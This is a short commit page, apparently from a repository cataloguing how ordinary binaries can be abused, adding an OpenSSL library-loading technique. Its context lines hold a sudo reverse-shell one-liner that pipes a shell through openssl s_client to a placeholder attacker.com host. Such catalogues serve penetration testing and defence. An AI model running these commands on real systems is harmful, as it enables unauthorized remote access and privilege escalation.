Add library load section to OpenSSL

master
d0zer 2020-04-12 21:20:11 +12:00 committed by GitHub
parent 3310197fbc
commit 041110d54d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 0 deletions

View File

@ -79,4 +79,6 @@ functions:
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
library-load:
- code: openssl req -engine ./lib.so
--- ---